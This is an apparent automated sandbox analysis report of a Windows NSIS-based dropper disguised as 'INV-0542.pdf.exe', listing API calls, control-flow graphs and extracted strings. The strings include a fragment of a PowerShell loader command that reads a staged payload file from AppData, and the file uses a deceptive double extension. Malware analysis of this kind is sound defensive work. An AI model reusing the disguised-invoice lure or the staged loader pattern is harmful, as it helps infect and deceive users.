SetDlgItemTextW 4703->4704 4704->4693 3707 4024af 3708 402dcb 21 API calls 3707->3708 3709 4024c1 3708->3709 3710 402dcb 21 API calls 3709->3710 3711 4024cb 3710->3711 3724 402e5b 3711->3724 3714 402503 3717 40250f 3714->3717 3720 402da9 21 API calls 3714->3720 3715 402953 3716 402dcb 21 API calls 3719 4024f9 lstrlenW 3716->3719 3718 40252e RegSetValueExW 3717->3718 3728 4032d9 3717->3728 3722 402544 RegCloseKey 3718->3722 3719->3714 3720->3717 3722->3715 3725 402e76 3724->3725 3749 4063dc 3725->3749 3730 4032f2 3728->3730 3729 40331d 3753 4034be 3729->3753 3730->3729 3763 4034d4 SetFilePointer 3730->3763 3734 40333a GetTickCount 3745 40334d 3734->3745 3735 40345e 3736 403462 3735->3736 3741 40347a 3735->3741 3738 4034be ReadFile 3736->3738 3737 403448 3737->3718 3738->3737 3739 4034be ReadFile 3739->3741 3740 4034be ReadFile 3740->3745 3741->3737 3741->3739 3742 4060e3 WriteFile 3741->3742 3742->3741 3744 4033b3 GetTickCount 3744->3745 3745->3737 3745->3740 3745->3744 3746 4033dc MulDiv wsprintfW 3745->3746 3748 4060e3 WriteFile 3745->3748 3756 406ab0 3745->3756 3747 4055c6 28 API calls 3746->3747 3747->3745 3748->3745 3750 4063eb 3749->3750 3751 4024db 3750->3751 3752 4063f6 RegCreateKeyExW 3750->3752 3751->3714 3751->3715 3751->3716 3752->3751 3754 4060b4 ReadFile 3753->3754 3755 403328 3754->3755 3755->3734 3755->3735 3755->3737 3757 406ad5 3756->3757 3758 406add 3756->3758 3757->3745 3758->3757 3759 406b64 GlobalFree 3758->3759 3760 406b6d GlobalAlloc 3758->3760 3761 406be4 GlobalAlloc 3758->3761 3762 406bdb GlobalFree 3758->3762 3759->3760 3760->3757 3760->3758 3761->3757 3761->3758 3762->3761 3763->3729 3764 402930 3765 402dcb 21 API calls 3764->3765 3766 402937 FindFirstFileW 3765->3766 3767 40295f 3766->3767 3771 40294a 3766->3771 3768 402968 3767->3768 3772 406488 wsprintfW 3767->3772 3773 406541 lstrcpynW 3768->3773 3772->3768 3773->3771 4705 404630 lstrlenW 4706 404651 WideCharToMultiByte 4705->4706 4707 40464f 4705->4707 4707->4706 4708 401931 4709 401968 4708->4709 4710 402dcb 21 API calls 4709->4710 4711 40196d 4710->4711 4712 405c4d 71 API calls 4711->4712 4713 401976 4712->4713 4714 4049b1 4715 4049dd 4714->4715 4716 4049ee 4714->4716 4775 405b85 GetDlgItemTextW 4715->4775 4717 4049fa GetDlgItem 4716->4717 4750 404a59 4716->4750 4720 404a0e 4717->4720 4719 4049e8 4722 4067ef 5 API calls 4719->4722 4723 404a22 SetWindowTextW 4720->4723 4727 405ebb 4 API calls 4720->4727 4721 404b3d 4724 404cec 4721->4724 4777 405b85 GetDlgItemTextW 4721->4777 4722->4716 4728 4044c0 22 API calls 4723->4728 4726 404527 8 API calls 4724->4726 4731 404d00 4726->4731 4732 404a18 4727->4732 4733 404a3e 4728->4733 4729 40657e 21 API calls 4734 404acd SHBrowseForFolderW 4729->4734 4730 404b6d 4735 405f18 18 API calls 4730->4735 4732->4723 4739 405e10 3 API calls 4732->4739 4736 4044c0 22 API calls 4733->4736 4734->4721 4737 404ae5 CoTaskMemFree 4734->4737 4738 404b73 4735->4738 4740 404a4c 4736->4740 4741 405e10 3 API calls 4737->4741 4778 406541 lstrcpynW 4738->4778 4739->4723 4776 4044f5 SendMessageW 4740->4776 4743 404af2 4741->4743 4746 404b29 SetDlgItemTextW 4743->4746 4751 40657e 21 API calls 4743->4751 4745 404a52 4748 406935 5 API calls 4745->4748 4746->4721 4747 404b8a 4749 406935 5 API calls 4747->4749 4748->4750 4758 404b91 4749->4758 4750->4721 4750->4724 4750->4729 4752 404b11 lstrcmpiW 4751->4752 4752->4746 4754 404b22 lstrcatW 4752->4754 4753 404bd2 4779 406541 lstrcpynW 4753->4779 4754->4746 4756 404bd9 4757 405ebb 4 API calls 4756->4757 4759 404bdf GetDiskFreeSpaceW 4757->4759 4758->4753 4762 405e5c 2 API calls 4758->4762 4764 404c2a 4758->4764 4761 404c03 MulDiv 4759->4761 4759->4764 4761->4764 4762->4758 4763 404c9b 4766 404cbe 4763->4766 4768 40140b 2 API calls 4763->4768 4764->4763 4765 404e36 24 API calls 4764->4765 4767 404c88 4765->4767 4780 4044e2 KiUserCallbackDispatcher 4766->4780 4769 404c9d SetDlgItemTextW 4767->4769 4770 404c8d 4767->4770 4768->4766 4769->4763 4772 404d6d 24 API calls 4770->4772 4772->4763 4773 404cda 4773->4724 4774 40490a SendMessageW 4773->4774 4774->4724 4775->4719 4776->4745 4777->4730 4778->4747 4779->4756 4780->4773 4781 401934 4782 402dcb 21 API calls 4781->4782 4783 40193b 4782->4783 4784 405ba1 MessageBoxIndirectW 4783->4784 4785 401944 4784->4785 4786 4028b6 4787 4028bd 4786->4787 4789 402bce 4786->4789 4788 402da9 21 API calls 4787->4788 4790 4028c4 4788->4790 4791 4028d3 SetFilePointer 4790->4791 4791->4789 4792 4028e3 4791->4792 4794 406488 wsprintfW 4792->4794 4794->4789 4795 401f37 4796 402dcb 21 API calls 4795->4796 4797 401f3d 4796->4797 4798 402dcb 21 API calls 4797->4798 4799 401f46 4798->4799 4800 402dcb 21 API calls 4799->4800 4801 401f4f 4800->4801 4802 402dcb 21 API calls 4801->4802 4803 401f58 4802->4803 4804 401423 28 API calls 4803->4804 4805 401f5f 4804->4805 4812 405b67 ShellExecuteExW 4805->4812 4807 401fa7 4808 4069e0 5 API calls 4807->4808 4809 402953 4807->4809 4810 401fc4 CloseHandle 4808->4810 4810->4809 4812->4807 4813 402fb8 4814 402fca SetTimer 4813->4814 4816 402fe3 4813->4816 4814->4816 4815 403038 4816->4815 4817 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4816->4817 4817->4815 4818 4014b8 4819 4014be 4818->4819 4820 401389 2 API calls 4819->4820 4821 4014c6 4820->4821 4822 40553a 4823 40554a 4822->4823 4824 40555e 4822->4824 4825 405550 4823->4825 4826 4055a7 4823->4826 4827 405566 IsWindowVisible 4824->4827 4833 40557d 4824->4833 4829 40450c SendMessageW 4825->4829 4828 4055ac CallWindowProcW 4826->4828 4827->4826 4830 405573 4827->4830 4831 40555a 4828->4831 4829->4831 4832 404e7b 5 API calls 4830->4832 4832->4833 4833->4828 4834 404efb 4 API calls 4833->4834 4834->4826 4835 401d3c 4836 402da9 21 API calls 4835->4836 4837 401d42 IsWindow 4836->4837 4838 401a45 4837->4838

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 40351c-40356e SetErrorMode GetVersionExW 1 403570-4035a0 GetVersionExW 0->1 2 4035a8-4035ad 0->2 1->2 3 4035b5-4035f7 2->3 4 4035af 2->4 5 4035f9-403601 call 406935 3->5 6 40360a 3->6 4->3 5->6 11 403603 5->11 8 40360f-403623 call 4068c5 lstrlenA 6->8 13 403625-403641 call 406935 * 3 8->13 11->6 20 403652-4036b6 #17 OleInitialize SHGetFileInfoW call 406541 GetCommandLineW call 406541 13->20 21 403643-403649 13->21 28 4036b8-4036ba 20->28 29 4036bf-4036d3 call 405e3d CharNextW 20->29 21->20 25 40364b 21->25 25->20 28->29 32 4037ce-4037d4 29->32 33 4036d8-4036de 32->33 34 4037da 32->34 36 4036e0-4036e5 33->36 37 4036e7-4036ee 33->37 35 4037ee-403808 GetTempPathW call 4034eb 34->35 47 403860-40387a DeleteFileW call 4030a2 35->47 48 40380a-403828 GetWindowsDirectoryW lstrcatW call 4034eb 35->48 36->36 36->37 38 4036f0-4036f5 37->38 39 4036f6-4036fa 37->39 38->39 41 403700-403706 39->41 42 4037bb-4037ca call 405e3d 39->42 45 403720-403759 41->45 46 403708-40370f 41->46 42->32 56 4037cc-4037cd 42->56 53 403776-4037b0 45->53 54 40375b-403760 45->54 51 403711-403714 46->51 52 403716 46->52 62 403880-403886 47->62 63 403a67-403a77 call 403b39 OleUninitialize 47->63 48->47 66 40382a-40385a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034eb 48->66 51->45 51->52 52->45 60 4037b2-4037b6 53->60 61 4037b8-4037ba 53->61 54->53 58 403762-40376a 54->58 56->32 64 403771 58->64 65 40376c-40376f 58->65 60->61 67 4037dc-4037e9 call 406541 60->67 61->42 69 40388c-403897 call 405e3d 62->69 70 40391f-403926 call 403c13 62->70 77 403a79-403a89 call 405ba1 ExitProcess 63->77 78 403a9d-403aa3 63->78 64->53 65->53 65->64 66->47 66->63 67->35 82 4038e5-4038ef 69->82 83 403899-4038ce 69->83 80 40392b-40392f 70->80 84 403b21-403b29 78->84 85 403aa5-403abb GetCurrentProcess OpenProcessToken 78->85 80->63 92 4038f1-4038ff call 405f18 82->92 93 403934-40395a call 405b0c lstrlenW call 406541 82->93 89 4038d0-4038d4 83->89 86 403b2b 84->86 87 403b2f-403b33 ExitProcess 84->87 90 403af1-403aff call 406935 85->90 91 403abd-403aeb LookupPrivilegeValueW AdjustTokenPrivileges 85->91 86->87 94 4038d6-4038db 89->94 95 4038dd-4038e1 89->95 105 403b01-403b0b 90->105 106 403b0d-403b18 ExitWindowsEx 90->106 91->90 92->63 103 403905-40391b call 406541 * 2 92->103 112 40396b-403983 93->112 113 40395c-403966 call 406541 93->113 94->95 99 4038e3 94->99 95->89 95->99 99->82 103->70 105->106 108 403b1a-403b1c call 40140b 105->108 106->84 106->108 108->84 115 403988-40398c 112->115 113->112 118 403991-4039bb wsprintfW call 40657e 115->118 122 4039c4 call 405aef 118->122 123 4039bd-4039c2 call 405a95 118->123 127 4039c9-4039cb 122->127 123->127 128 403a07-403a26 SetCurrentDirectoryW call 406301 CopyFileW 127->128 129 4039cd-4039d7 GetFileAttributesW 127->129 136 403a65 128->136 137 403a28-403a49 call 406301 call 40657e call 405b24 128->137 131 4039f8-403a03 129->131 132 4039d9-4039e2 DeleteFileW 129->132 131->115 133 403a05 131->133 132->131 135 4039e4-4039f6 call 405c4d 132->135 133->63 135->118 135->131 136->63 146 403a4b-403a55 137->146 147 403a8f-403a9b CloseHandle 137->147 146->136 148 403a57-403a5f call 40689e 146->148 147->136 148->118 148->136
                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNELBASE ref: 0040353F
                                                                                                                                                                • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                                                                                                                                • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                                                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                                                                                                                                • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040365A
                                                                                                                                                                • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                                                                                                                                • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\INV-0542.pdf.exe",00000020,"C:\Users\user\Desktop\INV-0542.pdf.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                                                                                                                                • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
                                                                                                                                                                  • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                                                                                                                • wsprintfW.USER32 ref: 0040399B
                                                                                                                                                                • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
                                                                                                                                                                • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08
                                                                                                                                                                  • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                                                                                                                                • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E
                                                                                                                                                                  • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                                                                                                                  • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                                                                                                                  • Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(75923420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
                                                                                                                                                                  • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                                                                                                                                • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403A89
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403B33
                                                                                                                                                                  • Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                                • String ID: "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkk$"C:\Users\user\Desktop\INV-0542.pdf.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                                                • API String ID: 1813718867-2779638779
                                                                                                                                                                • Opcode ID: fe98246c755eeab53da9b3688b78c9a4485cce5d238f6f2650d08d02ed1bb6d0
                                                                                                                                                                • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                                                                                                                                • Opcode Fuzzy Hash: fe98246c755eeab53da9b3688b78c9a4485cce5d238f6f2650d08d02ed1bb6d0
                                                                                                                                                                • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 151 405705-405720 152 405726-4057ed GetDlgItem * 3 call 4044f5 call 404e4e GetClientRect GetSystemMetrics SendMessageW * 2 151->152 153 4058af-4058b6 151->153 176 40580b-40580e 152->176 177 4057ef-405809 SendMessageW * 2 152->177 155 4058e0-4058ed 153->155 156 4058b8-4058da GetDlgItem CreateThread CloseHandle 153->156 158 40590b-405915 155->158 159 4058ef-4058f5 155->159 156->155 162 405917-40591d 158->162 163 40596b-40596f 158->163 160 405930-405939 call 404527 159->160 161 4058f7-405906 ShowWindow * 2 call 4044f5 159->161 173 40593e-405942 160->173 161->158 166 405945-405955 ShowWindow 162->166 167 40591f-40592b call 404499 162->167 163->160 170 405971-405977 163->170 174 405965-405966 call 404499 166->174 175 405957-405960 call 4055c6 166->175 167->160 170->160 171 405979-40598c SendMessageW 170->171 178 405992-4059bd CreatePopupMenu call 40657e AppendMenuW 171->178 179 405a8e-405a90 171->179 174->163 175->174 180 405810-40581c SendMessageW 176->180 181 40581e-405835 call 4044c0 176->181 177->176 188 4059d2-4059e7 TrackPopupMenu 178->188 189 4059bf-4059cf GetWindowRect 178->189 179->173 180->181 190 405837-40584b ShowWindow 181->190 191 40586b-40588c GetDlgItem SendMessageW 181->191 188->179 192 4059ed-405a04 188->192 189->188 193 40585a 190->193 194 40584d-405858 ShowWindow 190->194 191->179 195 405892-4058aa SendMessageW * 2 191->195 196 405a09-405a24 SendMessageW 192->196 197 405860-405866 call 4044f5 193->197 194->197 195->179 196->196 198 405a26-405a49 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405a4b-405a72 SendMessageW 198->200 200->200 201 405a74-405a88 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->179
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004057AF
                                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405852
                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                                                                                                                                  • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004058DA
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004058FE
                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 00405903
                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 0040594D
                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405992
                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004059C6
                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405A27
                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405A2D
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                                                                                                                                • CloseClipboard.USER32 ref: 00405A88
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                • String ID: {
                                                                                                                                                                • API String ID: 590372296-366298937
                                                                                                                                                                • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                                                                                                                • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                                                                                                                                • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                                                                                                                • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 509 405c4d-405c73 call 405f18 512 405c75-405c87 DeleteFileW 509->512 513 405c8c-405c93 509->513 514 405e09-405e0d 512->514 515 405c95-405c97 513->515 516 405ca6-405cb6 call 406541 513->516 518 405db7-405dbc 515->518 519 405c9d-405ca0 515->519 522 405cc5-405cc6 call 405e5c 516->522 523 405cb8-405cc3 lstrcatW 516->523 518->514 521 405dbe-405dc1 518->521 519->516 519->518 524 405dc3-405dc9 521->524 525 405dcb-405dd3 call 40689e 521->525 526 405ccb-405ccf 522->526 523->526 524->514 525->514 533 405dd5-405de9 call 405e10 call 405c05 525->533 529 405cd1-405cd9 526->529 530 405cdb-405ce1 lstrcatW 526->530 529->530 532 405ce6-405d02 lstrlenW FindFirstFileW 529->532 530->532 534 405d08-405d10 532->534 535 405dac-405db0 532->535 551 405e01-405e04 call 4055c6 533->551 552 405deb-405dee 533->552 538 405d30-405d44 call 406541 534->538 539 405d12-405d1a 534->539 535->518 537 405db2 535->537 537->518 549 405d46-405d4e 538->549 550 405d5b-405d66 call 405c05 538->550 541 405d1c-405d24 539->541 542 405d8f-405d9f FindNextFileW 539->542 541->538 546 405d26-405d2e 541->546 542->534 545 405da5-405da6 FindClose 542->545 545->535 546->538 546->542 549->542 554 405d50-405d59 call 405c4d 549->554 562 405d87-405d8a call 4055c6 550->562 563 405d68-405d6b 550->563 551->514 552->524 553 405df0-405dff call 4055c6 call 406301 552->553 553->514 554->542 562->542 565 405d6d-405d7d call 4055c6 call 406301 563->565 566 405d7f-405d85 563->566 565->542 566->542
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405C76
                                                                                                                                                                • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405CBE
                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405CE1
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405CE7
                                                                                                                                                                • FindFirstFileW.KERNELBASE(00424F10,?,?,?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405CF7
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                                                                                                                                Strings
                                                                                                                                                                • "C:\Users\user\Desktop\INV-0542.pdf.exe", xrefs: 00405C56
                                                                                                                                                                • \*.*, xrefs: 00405CB8
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
